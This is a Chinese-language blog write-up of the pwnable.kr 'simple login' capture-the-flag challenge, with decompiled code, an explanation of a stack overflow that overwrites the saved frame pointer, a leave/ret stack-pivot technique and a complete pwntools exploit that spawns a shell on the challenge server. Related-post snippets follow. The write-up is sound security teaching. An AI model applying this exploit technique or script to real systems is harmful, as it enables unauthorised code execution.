pwnable.kr - simple login

最新推荐文章于 2024-08-20 22:47:57 发布
原创 最新推荐文章于 2024-08-20 22:47:57 发布 · 761 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwnable.kr #simple login

本文分析了一个静态链接可执行文件中的登录认证过程,揭示了其中存在的栈溢出漏洞,并详细阐述了如何利用该漏洞来控制程序流程,最终实现获取shell权限的技术细节。

题目信息

题目给出的信息如下:

题目信息

分析

下载得到 login 文件,这是一个静态链接的可执行文件。拖进 IDA 分析,main 函数如下:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  _BYTE *v4; // [esp+18h] [ebp-28h]
  char s; // [esp+1Eh] [ebp-22h]
  unsigned int v6; // [esp+3Ch] [ebp-4h]

  memset(&s, 0, 0x1Eu);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  printf("Authenticate : ");
  _isoc99_scanf("%30s", &s);
  memset(&input, 0, 0xCu);
  v4 = 0;
  v6 = Base64Decode((int)&s, &v4);
  if ( v6 > 0xC )
  {
    puts((int)"Wrong Length");
  }
  else
  {
    memcpy(&input, v4, v6);
    if ( auth(v6) == 1 )
      correct();
  }
  return 0;
}

这里没有发现可以利用的漏洞,大概的流程是叫我们输入一个 base64 加密后的字符串,但是对长度进行了检查,解密后的长度不可以超过 12。继续分析 auth 函数如下:

_BOOL4 __cdecl auth(int a1)
{
  char v2; // [esp+14h] [ebp-14h]
  char *s2; // [esp+1Ch] [ebp-Ch]
  int v4; // [esp+20h] [ebp-8h]

  memcpy(&v4, &input, a1);
  s2 = (char *)calc_md5((int)&v2, 12);
  printf("hash : %s\n", s2);
  return strcmp("f87cd601aa7fedca99018a8be88eda34", s2) == 0;
}

这里将 input 存放的解密后的字符串复制到了 v4 中,但是 input 的长度最大可以达到 12,而 v4 的长度仅仅为 8,存在栈溢出漏洞。这里溢出的 4 个字节将会覆盖函数 auth 的栈帧中保存的 ebp,这是函数 auth 的调用函数 main 函数的 ebp。也就是说,我们可以通过这里的栈溢出控制 main 函数的 ebp 寄存器的值。回到 main 函数,继续分析 correct 函数如下:

void __noreturn correct()
{
  if ( input == 0xDEADBEEF )
  {
    puts((int)"Congratulation! you are good!");
    system("/bin/sh");
  }
  exit(0);
}

可以看到在 correct 函数里面直接调用了 system("/bin/sh"),如果能够控制 eip 直接跳转至这里,那么便可成功解题了。

解题思路

auth 函数以及 main 函数的返回处存在着两条相同的指令:

leave
ret

其中 leave 等价于:

mov esp, ebp
pop ebp

ret 等价于:

pop eip

所以实质上在 auth 以及 main 函数的返回处都是相同的三条指令:

mov esp, ebp
pop ebp
pop eip

首先通过栈溢出控制函数 auth 的栈帧中保存的 ebp,接着在其返回处通过 pop ebp 控制 main 函数的 ebp 寄存器的值,然后在 main 函数的返回处通过 mov esp, ebp 控制 esp 的值,进而通过 pop eip 控制 eip 的值,最终跳转至 system("/bin/sh")

wirteup

from pwn import *

context(os='linux', arch='i386', log_level='info')

p = remote('pwnable.kr', 9003)

call_system_addr = 0x8049284
ctrl_main_ebp = 0x811eb40

payload = 0x4 * 'a' + p32(call_system_addr) + p32(ctrl_main_ebp)
payload = b64e(payload)

p.recvuntil(' : ')
p.sendline(payload)

p.interactive()
pwnable.krsimple login
Jason_ZhouYetao的博客
07-14 716
这题与之前所作的题目不同,不同点在于这题不存在ssh连接至其他的服务器,需要自己在脚本中体现。 首先,下载文件,放到IDA里跑一跑(这里说明,要注意下载下来的文件是32位还是64位的文件,这关系到能不能正确打开并得到反汇编代码的问题),得到main函数的伪代码: int __cdecl main(int argc, const char **argv, const char **envp) ...
pwnable.kr】0x05-passcode Writeup
weixin_64667536的博客
08-30 585
Ubuntu-SSH连接根据目录信息拉取文件。
pwnable.krsimplelogin
bluestar628的博客
12-09 413
这道题目还是很有意思的。是自从参加了一次pwn培训之后的第一道题目,感觉确实比以前舒服多了。 下载题目,IDA反汇编,基本逻辑很简单,输入一个字符串,进行base64解密,然后比对长度,如果超过12个就直接报错。 漏洞点找了很久,这个漏洞点确实很巧妙。开始的时候,checksec了一下。 发现开启了栈执行保护,和缓冲区溢出保护。所以直接放弃了栈溢出这个思路,
pwnable.kr simple login
you_need_me的博客
06-02 319
点击打开链接
Pwnable.kr simple login
BengDouLove的博客
03-18 372
程序的逻辑是,首先输入s,最大三十个字节(这里没有溢出),然后base64解密,解密后的明文存在v4,长度存在v6, 后面判断v6不能大于12,判断成功后将v4复制到input变量,,之后进入auth函数 inout auth函数第一句的memcpy感觉就很突兀,把input复制给v4(这是autn里的v4),后面根本没有用到v4,从这个角度看这句话应该也有点问题,,, 因为前面判断了,所以inp...
pwnable.kr [Rookiss] - [simple login]
Re:Umiade.tr
03-23 1444
Can you get authentication from this server? Download : http://pwnable.kr/bin/login Running at : nc pwnable.kr 9003 Rookiss 初体验就从相对熟悉的逆向这一块开始好了。下载好文件后发现是 elf 64 ,在虚拟机上简单跑一跑,要求输入一个 Authenticat
pwnable.kr】0x02-collision Writeup
weixin_64667536的博客
08-20 528
拉取文件分析源码阅读源码后,执行样例测试输入2个参数1个参数,程序输出如下。
pwnable.kr】0x01-fd Writeup
weixin_64667536的博客
08-20 371
Ubuntu连接靶机(连不通的可以试一下proxychains)scp命令拷贝下fd源码文件。
pwnable.kr做题笔记(一)
has_zaoganmaqule的博客
08-12 2144
调用 `printf` 函数,`bl` 指令用于分支并链接,保存返回地址到链接寄存器 `lr`。- 将 `r4`, `r11`, 和 `lr` 寄存器的值压入栈中,用于保存函数调用前的状态。- 将 `r3` 的值(0)存储到 `r11` 指向的位置的偏移量 -16 处。- 如果 `r2` 和 `r3` 不相等,跳转到 `0x8da8` 地址处。- 调用 `scanf` 函数,`r0` 和 `r1` 作为参数传递。- 从 `r11` 指向的位置的偏移量 -16 处加载值到 `r3`。
pwnable.krsimple login详解
Bill
04-26 2246
学习二进制不容易,大家要忍得住寂寞,耐得住孤独,进入正题. 总体思路: 输入更多的数据,溢出,修改main的返回值地址,使其返回到correct中,从而获取shell. 大家可能会有疑问:为什么不修改auth函数的返回值地址,跳到correct中.这是因为长度不够,我们需要输入16个字节的长度,才能覆盖返回值地址,但是程序只给了我们12个字节的长度. main函数int main(int
pwn -- pwnable.kr -- simple-login---学习stack pivot
YANG12345_6的博客
12-24 441
在看关于pwn的书时学到了 栈帧劫持stack pivot 利用这个例题练习一下。 基本思想: stack pivot利用到的gadget是在函数退出时需要的两条指令:leave(mov esp,ebp;pop ebp);ret;。这两条指令基本都会有。 可以利用这两条指令,通过栈溢出的方式,实现可以完全控制栈。 stack pivot实现的基本方法 (我的理解 通过栈溢出的方式将 我们之后要实现的完全可控的栈的地址写到EBP的地方 写入之后 ,程序第一次leave;ret;,将写入的地址赋给esp。
pwnable_simple_login
z1r0的博客
03-25 697
pwnable_simple_login 查看保护 上面图片可以看到有个溢出,一直溢出到了ebp。也就是说我们可以控制ebp,那如何控制ret_addr呢? 其实我们可以伪造一个假的内存块的地址,这个地址里里面放一个伪造的ebp和返回地址及参数,让程序认为伪造了一个正确的ret_addr。 from pwn import * import base64 context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0'
pwnable simple login
weixin_30542079的博客
11-08 152
这是一周前做的一道题目,总的来说这道题很简单,当然一开始看了半天没发现溢出点也是十分的惭愧,题目出的很良心,思路就是溢出之后我们可以控制main函数的ebp, 进而在main函数返回时进行漏洞利用。 先看看IDA反汇编的结果 主函数的几个内存操作的函数都没有什么问题,那么问题很可能出现在auth函数了 这时候溢出点就一目了然了,input最大12个字节,而v4只有8个字节,调试一下发...
栈溢出之 pwnable.kr login
jiuweideqixu的博客
08-28 375
Can you get authentication from this server? Download : http://pwnable.kr/bin/login Running at : nc pwnable.kr 9003 反编译main函数 通过main函数的第21行我们知道,解码之后的字符串也被存放在了input指向的内存单元中。同时我们知道,input在bss段。 反编译Base64Decode函数 反编译auth函数 通过查看auth函数,我们发现很难通过.
simple login(Pwnable.kr)
weixin_30252709的博客
06-10 149
0x1 准备工作 在分析这个题目时,我遇到了下面两个问题,先在这里说明一下: 1、 内存无法访问 gdb-peda$ si Cannot access memory at address 0x61616165 gdb-peda$ si 然而程序并没有因此而停止,只是一个提示而已,可以继续使用si命令进行单步跟踪。 2、汇编命令leave leave指令等同于下面两条命令(32位) mov esp,...
pwnable(simple login)leave和ret的深入研究
九层台
09-30 776
通常栈溢出获取shell的方法是覆盖返回地址,但是如果溢出只允许覆盖到ebp该怎么办呢? Leave的作用相当==mov esp,ebp和pop ebp Win32汇编中局部变量的使用方法可以解释一个很有趣的现象:在DOS汇编的时候,如果在子程序中的push指令和pop指令不配对,那么返回的时候ret指令从堆栈里得到的肯定是错误的返回地址,程序也就死掉了。但在Win32汇编中,push指令和pop...
ia32中程序调用返回时call.ret.leave的作用和栈变换的说明
李海锋的博客
12-17 1784
ia32中程序调用和返回时所用到的call、ret、leave三个指令的作用和程序栈变换的说明(包括esp,ebp,eip)
这项基本功,你掌握的够扎实么?
mobilehub
03-25 424
本文节选自Allen在GitChat的分享Allen前言一直以来,我们学习线程切换与调度,都是通过阅读操作系统书籍或 Linux 源码甚至反汇编 Window 内...
PWN学习之[Rookiss]-[simple login]
Magic1an的博客
08-19 848
文件下载下来后是个elf可执行文件 用IDA反编译后可以看到溢出点在auth函数中_BOOL4 __cdecl auth(int a1) { char v2; // [sp+14h] [bp-14h]@1 char *s2; // [sp+1Ch] [bp-Ch]@1 int v4; // [sp+20h] [bp-8h]@1 memcpy(&v4, &input, a1); s
pwnable.kr bof
最新发布
09-16
### pwnable.kr bof题目概述 pwnable.kr 是一个著名的在线渗透测试练习平台,bof(Buffer Overflow,缓冲区溢出)题目是其中经典类型。缓冲区溢出通常是由于程序没有正确检查用户输入的长度,导致输入的数据超出了...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值